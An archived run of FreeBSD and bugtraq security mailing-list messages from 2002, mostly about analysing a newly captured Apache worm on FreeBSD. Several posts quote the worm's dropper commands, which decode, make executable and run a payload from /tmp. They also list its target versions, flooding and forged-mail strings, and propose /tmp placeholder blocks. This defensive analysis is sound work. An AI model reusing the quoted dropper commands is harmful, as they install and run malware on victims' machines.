<1025286115.2819.46.camel@jan-linux.lan>; from Jan.Lentfer@web.de on Fri, Jun 28, 2002 at 07:41:55PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jun 28, 2002 at 07:41:55PM +0200, Jan Lentfer wrote: > Thanks for all your replies, they have been all very helpfull. I just > have one, maybe two questions left: > I read that it was best to move the tripwire database to a read-only > medium (floppy or cdrom). I used the defaults of the tripwire-2.3 ports > and ended up with 3MB database. How did you guys configure your > tripwire? Is it better to clean up the configuration and by that shrink > the database to fit on a floppy? If so, what HAS TO stay, what can be > removed? Or is it better to stuff the database on a CD-RW and burn a new > one everytime you change stuff? I seem to remember reading instructions for mounting a floppy and then safely tarring/gzipping the tripwire db and moving it onto the floppy disk, somewhere in the tripwire documentation. After following that advice I managed to shrink a 5mb tripwire db file down to just over 1mb. I've had a quick search for the documentation in question but can't find it on my system, think it got cleared out recently - perhaps if you try grepping for fd0 in the documentation tarball someone mentioned above you might find the relevant instructions. Good luck, Jez To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 11:44:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E60CB37B412 for ; Fri, 28 Jun 2002 11:44:02 -0700 (PDT) Received: from dymwsm18.mailwatch.com (dymwsm18.mailwatch.com [204.253.83.220]) by mx1.FreeBSD.org (Postfix) with ESMTP id 14A8943E1A for ; Fri, 28 Jun 2002 11:42:26 -0700 (PDT) (envelope-from grothe@ford.com) Received: from MWSC0209.MW4.MAILWATCH.COM (mwsc0209.mw4.mailwatch.com [204.253.83.227]) by dymwsm18.mailwatch.com (8.11.0/8.11.0) with ESMTP id g5SIgOL14825 for ; Fri, 28 Jun 2002 14:42:24 -0400 Received: from mail pickup service by MWSC0209.MW4.MAILWATCH.COM with Microsoft SMTPSVC; Fri, 28 Jun 2002 14:42:24 -0400 Received: from 204.253.83.71 ([204.253.83.71]) by MWSC0209 with SMTP id 000200090bfbdfba-5859-4e9b-86fe-287134847c5e; Fri, 28 Jun 2002 14:42:24 -0500 Received: from eccmfw6.ford.com (mailfw6.ford.com [136.1.1.30]) by dymwsm09.mailwatch.com (8.11.0/8.11.0) with ESMTP id g5SIgOT05495 for ; Fri, 28 Jun 2002 14:42:24 -0400 Message-Id: <200206281842.g5SIgOT05495@dymwsm09.mailwatch.com> Received: by mailfw6.ford.com id OAA28785 (InterLock SMTP Gateway 4.2 for freebsd-security@freebsd.org); Fri, 28 Jun 2002 14:41:16 -0400 (EDT) Received: by mailfw6.ford.com (Internal Mail Agent-1); Fri, 28 Jun 2002 14:41:16 -0400 (EDT) Received: by mailfw6.ford.com (Internal Mail Agent-0); Fri, 28 Jun 2002 14:41:16 -0400 (EDT) From: "Rothe, Greg (G.A.)" To: "'flynn@energyhq.homeip.net'" , Domas Mituzas Cc: freebsd-security@freebsd.org, bugtraq@securityfocus.com, os_bsd@konferencijos.lt Subject: RE: Apache worm in the wild Date: Fri, 28 Jun 2002 14:42:02 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2655.15) Content-Type: text/plain HOP-COUNT: 1 X-MAILWATCH-INSTANCEID: 010200090bfbdfba-5859-4e9b-86fe-287134847c5e X-OriginalArrivalTime: 28 Jun 2002 18:42:24.0417 (UTC) FILETIME=[8B528910:01C21ED3] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Sorry, I'm confused. Which versions of apache qualify as "vulnerable?" -Greg -----Original Message----- From: flynn@energyhq.homeip.net [mailto:flynn@energyhq.homeip.net] Sent: Friday, June 28, 2002 7:39 AM To: Domas Mituzas Cc: freebsd-security@freebsd.org; bugtraq@securityfocus.com; os_bsd@konferencijos.lt Subject: Re: Apache worm in the wild On Fri, Jun 28, 2002 at 01:01:32PM +0200, Domas Mituzas wrote: Hi, > our honeypot systems trapped new apache worm(+trojan) in the wild. It > traverses through the net, and installs itself on all vulnerable > apaches it finds. No source code available yet, but I put the binaries > into public Wow, an interesting puppy. I just ran it through dasm to get the assembler dump. The executable is not even stripped, and makes an interesting read, as it gives lots of information. It looks like it was either coded by someone with little experience or in a hurry, and there are several system calls like this one: Possible reference to string: "/usr/bin/uudecode -p /tmp/.uua > /tmp/.a;killall -9 .a;chmod +x /tmp/.a;killall -9 .a;/ tmp/.a %s;exit;" I wonder how many variants of this kind of thing we'll see, but I assume most people running Apache have upgraded already. Cheers, -- Miguel Mendez - flynn@energyhq.homeip.net GPG Public Key :: http://energyhq.homeip.net/files/pubkey.txt EnergyHQ :: http://www.energyhq.tk Of course it runs NetBSD! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 12:53:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CD8DA37B400 for ; Fri, 28 Jun 2002 12:53:41 -0700 (PDT) Received: from devel.tfm.ro (devel.tfm.ro [193.230.227.35]) by mx1.FreeBSD.org (Postfix) with SMTP id 892B343E0A for ; Fri, 28 Jun 2002 12:53:37 -0700 (PDT) (envelope-from mihaim@tfm.ro) Received: (qmail 452 invoked by uid 518); 28 Jun 2002 19:46:06 -0000 Received: from localhost (HELO tfm.ro) (127.0.0.1) by localhost with SMTP; 28 Jun 2002 19:46:06 -0000 Received: from anamol.kappa.ro ([80.97.81.54]) (SquirrelMail authenticated user mihaim@tfm.ro) by mihai.tfm.ro with HTTP; Fri, 28 Jun 2002 22:46:06 +0300 (EEST) Message-ID: <32946.80.97.81.54.1025293566.squirrel@mihai.tfm.ro> Date: Fri, 28 Jun 2002 22:46:06 +0300 (EEST) Subject: Re: Apache worm in the wild From: "Mihai (Cop) Moldovanu" To: In-Reply-To: <20020628125817.O68824-100000@axis.tdd.lt> References: <20020628125817.O68824-100000@axis.tdd.lt> X-Priority: 3 Importance: Normal X-MSMail-Priority: Normal Cc: , , Reply-To: mihaim@tfm.ro X-Mailer: SquirrelMail (version 1.2.6) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Domas Mituzas said: > Hi, > > our honeypot systems trapped new apache worm(+trojan) in the wild. It > traverses through the net, and installs itself on all vulnerable > apaches it finds. No source code available yet, but I put the binaries > into public place, and more investigation is to be done. > > http://dammit.lt/apache-worm/ > > Regards, > Domas Mituzas > > Central systems @ MicroLink Data I dissasembled it. Was a good thing that executable was not stripped. Result is here : http://projects.tfm.ro/security/apache_worm/ I will look deeper into it tonight. Best Regards , -- TFM Group . Linux Division . Mihai Moldovanu http://www.tfm.ro/ http://portal.tfm.ro/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 12:57:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C325E37B401 for ; Fri, 28 Jun 2002 12:57:21 -0700 (PDT) Received: from energyhq.homeip.net (213-97-200-73.uc.nombres.ttd.es [213.97.200.73]) by mx1.FreeBSD.org (Postfix) with ESMTP id A849143E0F for ; Fri, 28 Jun 2002 12:57:19 -0700 (PDT) (envelope-from flynn@energyhq.homeip.net) Received: (from flynn@localhost) by energyhq.homeip.net (8.11.6/8.11.3) id g5SJw1g11634; Fri, 28 Jun 2002 21:58:01 +0200 (CEST) Date: Fri, 28 Jun 2002 21:58:01 +0200 From: flynn@energyhq.homeip.net To: Mike Tancsa Cc: freebsd-security@FreeBSD.ORG Subject: Re: Apache worm in the wild Message-ID: <20020628195801.GB10200@energyhq.homeip.net> References: <20020628125817.O68824-100000@axis.tdd.lt> <20020628125817.O68824-100000@axis.tdd.lt> <5.1.0.14.0.20020628123102.041e17a0@marble.sentex.ca> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="ZwgA9U+XZDXt4+m+" Content-Disposition: inline In-Reply-To: <5.1.0.14.0.20020628123102.041e17a0@marble.sentex.ca> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --ZwgA9U+XZDXt4+m+ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Jun 28, 2002 at 12:31:34PM -0400, Mike Tancsa wrote: Hi, > Is this aimed at all OSes are just FreeBSD ? The elf binary is a FreeBSD one, so I assume this exploit will only work on FreeBSD. I'm going to fully disect the code this weekend and post my results on the list. Cheers, --=20 Miguel Mendez - flynn@energyhq.homeip.net GPG Public Key :: http://energyhq.homeip.net/files/pubkey.txt EnergyHQ :: http://www.energyhq.tk Of course it runs NetBSD! --ZwgA9U+XZDXt4+m+ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (NetBSD) iD8DBQE9HL/JnLctrNyFFPERAlJNAJ9jNPfJ2BUjzgaPO5HNewTAjBvkWwCgoIct JAnaOLH6haCdlg9KvuNOaqI= =n02V -----END PGP SIGNATURE----- --ZwgA9U+XZDXt4+m+-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 13:10:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3E29D37B401 for ; Fri, 28 Jun 2002 13:10:37 -0700 (PDT) Received: from neptun.twoj.pl (neptun.goo.pl [80.48.39.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1064543E0A for ; Fri, 28 Jun 2002 13:10:36 -0700 (PDT) (envelope-from bugtraq-return-5401-cinek=goo.pl@securityfocus.com) Received: by neptun.twoj.pl (Postfix, from userid 107) id 43E773AC03; Fri, 28 Jun 2002 22:10:29 +0200 (CEST) Received: from sauron.mediasystems.pl (sauron.mediasystems.pl [80.48.39.11]) by neptun.twoj.pl (Postfix) with ESMTP id F2C8F3ABAD for ; Fri, 28 Jun 2002 22:10:28 +0200 (CEST) Received: from outgoing.securityfocus.com (outgoing2.securityfocus.com [66.38.151.26]) by sauron.mediasystems.pl (Postfix) with ESMTP id 2EC082729B for ; Fri, 28 Jun 2002 22:10:41 +0200 (CEST) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by outgoing.securityfocus.com (Postfix) with QMQP id 9F5708F290; Fri, 28 Jun 2002 13:16:10 -0600 (MDT) Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Id: List-Post: List-Help: List-Unsubscribe: List-Subscribe: Delivered-To: mailing list bugtraq@securityfocus.com Delivered-To: moderator for bugtraq@securityfocus.com Received: (qmail 14163 invoked from network); 28 Jun 2002 19:46:23 -0000 Message-ID: <32946.80.97.81.54.1025293566.squirrel@mihai.tfm.ro> Date: Fri, 28 Jun 2002 22:46:06 +0300 (EEST) Subject: Re: Apache worm in the wild From: "Mihai (Cop) Moldovanu" To: In-Reply-To: <20020628125817.O68824-100000@axis.tdd.lt> References: <20020628125817.O68824-100000@axis.tdd.lt> X-Priority: 3 Importance: Normal X-MSMail-Priority: Normal Cc: , , Reply-To: mihaim@tfm.ro X-Mailer: SquirrelMail (version 1.2.6) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Domas Mituzas said: > Hi, > > our honeypot systems trapped new apache worm(+trojan) in the wild. It > traverses through the net, and installs itself on all vulnerable > apaches it finds. No source code available yet, but I put the binaries > into public place, and more investigation is to be done. > > http://dammit.lt/apache-worm/ > > Regards, > Domas Mituzas > > Central systems @ MicroLink Data I dissasembled it. Was a good thing that executable was not stripped. Result is here : http://projects.tfm.ro/security/apache_worm/ I will look deeper into it tonight. Best Regards , -- TFM Group . Linux Division . Mihai Moldovanu http://www.tfm.ro/ http://portal.tfm.ro/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 13:13:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id ED59937B401 for ; Fri, 28 Jun 2002 13:13:02 -0700 (PDT) Received: from ns1.firemountain.net (66-105-101-81.customer.algx.net [66.105.101.81]) by mx1.FreeBSD.org (Postfix) with ESMTP id D386043E26 for ; Fri, 28 Jun 2002 13:12:22 -0700 (PDT) (envelope-from rsk@gsp.org) Received: from gsp.org (river.soc.lib.md.us [64.26.65.173]) by ns1.firemountain.net (8.11.6/8.11.6) with ESMTP id g5SK2oP13438 for ; Fri, 28 Jun 2002 16:02:51 -0400 (EDT) Received: (from rsk@localhost) by gsp.org (8.11.6/8.11.6) id g5SK7Zp02635 for freebsd-security@FreeBSD.ORG; Fri, 28 Jun 2002 16:07:35 -0400 (EDT) Date: Fri, 28 Jun 2002 16:07:35 -0400 From: Rich Kulawiec To: freebsd-security@FreeBSD.ORG Subject: Re: Apache worm in the wild [with POSSIBLE block] Message-ID: <20020628200734.GA2222@gsp.org> References: <20020628125817.O68824-100000@axis.tdd.lt> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020628125817.O68824-100000@axis.tdd.lt> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jun 28, 2002 at 01:01:32PM +0200, Domas Mituzas wrote: > it finds. No source code available yet, but I put the binaries into public > place, and more investigation is to be done. SUMMARY: Thanks for putting these up. Point #2 contains a POSSIBLE method that may block the spread of this worm and which (AFAIK) doesn't carry any risks of its own. I welcome criticism/corrections of my rather hasty (and therefore flawed) analysis. 1. A very fast (<5 minutes) preliminary look at this tends to me make me think this MAY be intended as as DoS tool. Why? Well, for one thing, some TLD suffixes are apparently hard-coded in, e.g. ".gov" which someone contemplating a DoS attack would be wise to do. But more interestingly, these text strings are present: Size must be less than or equal to 9216 Cannot packet local networks Udp flooding target Tcp flooding target Sending packets to target Dns flooding target 2. I suspect that most of its propagation method is encapsulated here: rm -rf /tmp/.a;cat > /tmp/.uua << __eof__; __eof__ /usr/bin/uudecode -p /tmp/.uua > /tmp/.a;killall -9 .a;chmod +x /tmp/.a;killall -9 .a;/tmp/.a %s;exit; I would suggest that just as 14 years ago we found that insufficient error checking in the Morris worm led to a quick way to stop it via creation of a file in /tmp (the Purdue "condom" fix), that mkdir /tmp/.a chmod 000 /tmp/.a chown root /tmp/.a MAY stop this. Please don't consider this in any way a guarantee: like I said: < 5 minutes of analysis went into this. (My reasoning: shell script fragment above tries to use uudecode to turn uuencoded file /tmp/.uua into executable binary /tmp/.a; if .a already exists as a directory, not even route will be able to overwrite it via shell redirection. The chmod/chown is proabably not necessary but won't hurt. Systems which has daemons that periodically clean out /tmp might need to use cron to periodically re-do this.) However, it's worth pointing out that even if I'm wrong, this will do no harm, so I think the risk in trying it is minimal. 3. These strings occur as well: FreeBSD 4.5 x86 / Apache/1.3.22-24 (Unix) FreeBSD 4.5 x86 / Apache/1.3.20 (Unix) Speculation: are these the targeted (vulnerable) systems? If so, why no Apache 1.3.21? 4. I believe this IP address is hard-coded into it: 12.127.17.71 which reverse-resolves to dns-rs1.bgtmo.ip.att.net which I would guess is a DNS server in Bridgeton, Missouri? Why that IP address? Has the machine there been comprised? Or is the entire purpose of this to attack that single machine? 5. There is evidence that this binary knows how to connect to SMTP servers and send mail messages through them, forging headers to give the appearance that the message was sent by an AOL user: HELO %s MAIL FROM:<%s> RCPT TO:<%s> DATA QUIT Return-Path: <%c%c%c%c%c%c%c@aol.com> From: %s Message-ID: <%x.%x.%x@aol.com> Date: %s Subject: %s To: %s Mime-Version: 1.0 Content-Type: text/html 6. It may also use a subdirectory of /tmp; these strings occur as well: /tmp/tmp Unable to open temporary file for writing Error communicating with website Timed out while receiving data UNKNOWN-CHECKSUM-SUCCESSFUL Checksum for data failed mv /tmp/tmp /tmp/init;export PATH="/tmp";init %s which may mean that "mkdir /tmp/tmp;chmod 000 /tmp/tmp;chown root /tmp/tmp" might not be a bad idea. Once again, I apologize for the haphazard nature of this analysis, but thought it worth sending out if for no other reason than getting point #2 out for discussion in the community. ---Rsk Rich Kulawiec rsk@magpage.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 13:21:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A798837B400 for ; Fri, 28 Jun 2002 13:21:09 -0700 (PDT) Received: from bastet.rfc822.net (bastet.rfc822.net [64.81.113.233]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2839843E06 for ; Fri, 28 Jun 2002 13:21:09 -0700 (PDT) (envelope-from pde@bastet.rfc822.net) Received: by bastet.rfc822.net (Postfix, from userid 1001) id 396B19FD21; Fri, 28 Jun 2002 15:21:11 -0500 (CDT) Date: Fri, 28 Jun 2002 15:21:11 -0500 From: Pete Ehlke To: freebsd-security@FreeBSD.ORG Subject: Re: Apache worm in the wild [with POSSIBLE block] Message-ID: <20020628202111.GA14964@rfc822.net> References: <20020628125817.O68824-100000@axis.tdd.lt> <20020628200734.GA2222@gsp.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020628200734.GA2222@gsp.org> User-Agent: Mutt/1.3.27i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jun 28, 2002 at 04:07:35PM -0400, Rich Kulawiec wrote: > > 4. I believe this IP address is hard-coded into it: > > 12.127.17.71 > > which reverse-resolves to > > dns-rs1.bgtmo.ip.att.net > > which I would guess is a DNS server in Bridgeton, Missouri? Why that > IP address? Has the machine there been comprised? Or is the entire > purpose of this to attack that single machine? > That machine appears to be running a vulnerable version of BIND. I'd bet body parts that it was compromised some time ago and is a cooridination node for a DDoS network. Null routing it probably won't hurt anyone. -Pete To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 13:25:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 72B4937B400 for ; Fri, 28 Jun 2002 13:25:44 -0700 (PDT) Received: from neptun.twoj.pl (neptun.goo.pl [80.48.39.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id C3B0D43E06 for ; Fri, 28 Jun 2002 13:25:43 -0700 (PDT) (envelope-from bugtraq-return-5400-cinek=goo.pl@securityfocus.com) Received: by neptun.twoj.pl (Postfix, from userid 107) id C5D293ABD3; Fri, 28 Jun 2002 22:25:41 +0200 (CEST) Received: from outgoing.securityfocus.com (outgoing3.securityfocus.com [66.38.151.27]) by neptun.twoj.pl (Postfix) with ESMTP id 03E763ABAD for ; Fri, 28 Jun 2002 22:25:41 +0200 (CEST) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by outgoing.securityfocus.com (Postfix) with QMQP id 5F712A35CD; Fri, 28 Jun 2002 12:34:55 -0600 (MDT) Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Id: List-Post: List-Help: List-Unsubscribe: List-Subscribe: Delivered-To: mailing list bugtraq@securityfocus.com Delivered-To: moderator for bugtraq@securityfocus.com Received: (qmail 1848 invoked from network); 28 Jun 2002 18:09:59 -0000 Message-ID: <016901c21ecf$0e506ad0$a101000a@Lust> From: "wink" To: "Domas Mituzas" , Cc: , References: <20020628125817.O68824-100000@axis.tdd.lt> Subject: Re: Apache worm in the wild Date: Fri, 28 Jun 2002 13:10:05 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Running strings on the binary amongst other things produces an ip address (12.127.17.71) that resolves to dns-rs1.bgtmo.ip.att.net, and also: FreeBSD 4.5 x86 / Apache/1.3.22-24 (Unix) FreeBSD 4.5 x86 / Apache/1.3.20 (Unix) I went ahead and touch'ed .a, .uua, and .log in /tmp and chflags to set them immutable as I didn't see any real error handling on failed i/o operations. Some other strings not mentioned yet are: rm -rf /tmp/.a;cat > /tmp/.uua << __eof__; mv /tmp/tmp /tmp/init;export PATH="/tmp";init %s that's all i have time for at the moment. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 13:28:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D133837B400 for ; Fri, 28 Jun 2002 13:28:51 -0700 (PDT) Received: from axis.tdd.lt (axis.tdd.lt [213.197.128.94]) by mx1.FreeBSD.org (Postfix) with ESMTP id 796E643E0A for ; Fri, 28 Jun 2002 13:28:50 -0700 (PDT) (envelope-from domas.mituzas@microlink.lt) Received: from localhost (midom@localhost) by axis.tdd.lt (8.11.6/8.11.6) with ESMTP id g5SKSkN59949; Fri, 28 Jun 2002 22:28:46 +0200 (EET) (envelope-from domas.mituzas@microlink.lt) X-Authentication-Warning: axis.tdd.lt: midom owned process doing -bs Date: Fri, 28 Jun 2002 22:28:46 +0200 (EET) From: Domas Mituzas X-X-Sender: midom@axis.tdd.lt To: bugtraq@securityfocus.com, Subject: apache-worm.c Message-ID: <20020628222723.G59739-100000@axis.tdd.lt> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, no need for further binary analysis, I've got the source in my inbox: http://dammit.lt/apache-worm/apache-worm.c Regards, Domas Mituzas MicroLink Data To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 14: 8:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1072F37B4A4 for ; Fri, 28 Jun 2002 14:08:24 -0700 (PDT) Received: from smtp1.healthsouth.com (egress-a.healthsouth.com [12.105.215.2]) by mx1.FreeBSD.org (Postfix) with SMTP id 3F23F43E09 for ; Fri, 28 Jun 2002 14:08:22 -0700 (PDT) (envelope-from Dan.Clemens@healthsouth.com) Received: from 10.1.1.145 by smtp1.healthsouth.com (InterScan E-Mail VirusWall NT); Fri, 28 Jun 2002 16:09:47 -0500 Received: by hs01ms01.healthsouth.insidehrc.com with Internet Mail Service (5.5.2655.55) id ; Fri, 28 Jun 2002 16:07:21 -0500 Message-ID: <414492630AD3F845BD87926E57A7BBE83B07F8@hs01ms11.healthsouth.insidehrc.com> From: "Clemens, Dan" To: wink , Domas Mituzas , freebsd-security@freebsd.org Cc: bugtraq@securityfocus.com Subject: RE: Apache worm in the wild Date: Fri, 28 Jun 2002 16:07:17 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2655.55) Content-Type: multipart/mixed; boundary="------------InterScan_NT_MIME_Boundary" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. --------------InterScan_NT_MIME_Boundary Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C21EE7.C9196B28" ------_=_NextPart_001_01C21EE7.C9196B28 Content-Type: text/plain; charset="iso-8859-1" Just out of curiosity did this worm try to attack port 443 and 80 or just 80 ? Simply, Daniel Uriah Clemens HealthSouth Corp. 205.969.4781 877.806.8928 alert@us.healthsouth.com [Ebiz|System Administrator|Packet-Ninja] -----Original Message----- From: wink [mailto:wink@deceit.org] Sent: Friday, June 28, 2002 1:10 PM To: Domas Mituzas; freebsd-security@freebsd.org Cc: bugtraq@securityfocus.com; os_bsd@konferencijos.lt Subject: Re: Apache worm in the wild Running strings on the binary amongst other things produces an ip address (12.127.17.71) that resolves to dns-rs1.bgtmo.ip.att.net, and also: FreeBSD 4.5 x86 / Apache/1.3.22-24 (Unix) FreeBSD 4.5 x86 / Apache/1.3.20 (Unix) I went ahead and touch'ed .a, .uua, and .log in /tmp and chflags to set them immutable as I didn't see any real error handling on failed i/o operations. Some other strings not mentioned yet are: rm -rf /tmp/.a;cat > /tmp/.uua << __eof__; mv /tmp/tmp /tmp/init;export PATH="/tmp";init %s that's all i have time for at the moment. Confidentiality Notice: This e-mail communication and any attachments may contain confidential and privileged information for the use of the designated recipients named above. If you are not the intended recipient, you are hereby notified that you have received this communication in error and that any review, disclosure, dissemination, distribution or copying of it or its contents is prohibited. If you have received this communication in error, please notify me immediately by replying to this message and deleting it from your computer. Thank you. ------_=_NextPart_001_01C21EE7.C9196B28 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable RE: Apache worm in the wild

Just out of curiosity did this worm try to attack = port 443 and 80 or just 80 ?


Simply,

Daniel Uriah Clemens
  HealthSouth Corp.
  205.969.4781
  877.806.8928
  alert@us.healthsouth.com
[Ebiz|System Administrator|Packet-Ninja]

-----Original Message-----
From: wink [mailto:wink@deceit.org]
Sent: Friday, June 28, 2002 1:10 PM
To: Domas Mituzas; = freebsd-security@freebsd.org
Cc: bugtraq@securityfocus.com; = os_bsd@konferencijos.lt
Subject: Re: Apache worm in the wild


Running strings on the binary amongst other things = produces an ip address
(12.127.17.71) that resolves to = dns-rs1.bgtmo.ip.att.net, and also:

FreeBSD 4.5 x86 / Apache/1.3.22-24 (Unix)
FreeBSD 4.5 x86 / Apache/1.3.20 (Unix)

I went ahead and touch'ed .a, .uua, and .log in /tmp = and chflags to set them
immutable as I didn't see any real error handling on = failed i/o operations.
Some other strings not mentioned yet are:

rm -rf /tmp/.a;cat > /tmp/.uua << = __eof__;
mv /tmp/tmp /tmp/init;export = PATH=3D"/tmp";init %s

that's all i have time for at the moment.
Confidentiality Notice:  This e-mail = communication and any attachments may contain confidential and = privileged information for the use of the designated recipients named = above.  If you are not the intended recipient, you are hereby = notified that  you have received this communication in error and = that any review, disclosure, dissemination, distribution or copying of = it or its contents is prohibited.  If you have received this = communication in error, please notify me immediately by replying to = this message and deleting it from your computer.  Thank = you.

------_=_NextPart_001_01C21EE7.C9196B28-- --------------InterScan_NT_MIME_Boundary-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 14:46:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DEAFB37B405 for ; Fri, 28 Jun 2002 14:46:07 -0700 (PDT) Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by mx1.FreeBSD.org (Postfix) with SMTP id 333A043E09 for ; Fri, 28 Jun 2002 14:46:06 -0700 (PDT) (envelope-from karsten@rohrbach.de) Received: (qmail 11452 invoked by uid 1000); 28 Jun 2002 21:46:27 -0000 Date: Fri, 28 Jun 2002 23:46:26 +0200 From: "Karsten W. Rohrbach" To: Chris Johnson Cc: FreeBSD Security Mailling List , dinoex@freebsd.org Subject: Re: Installing openssh-portable 3.4 Message-ID: <20020628234626.A11149@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , Chris Johnson , FreeBSD Security Mailling List , dinoex@freebsd.org References: <1025211566.2815.110.camel@jan-linux.lan> <20020627225747.GA70498@palomine.net> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="IS0zKkzwUGydFO0o" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020627225747.GA70498@palomine.net>; from cjohnson@palomine.net on Thu, Jun 27, 2002 at 06:57:47PM -0400 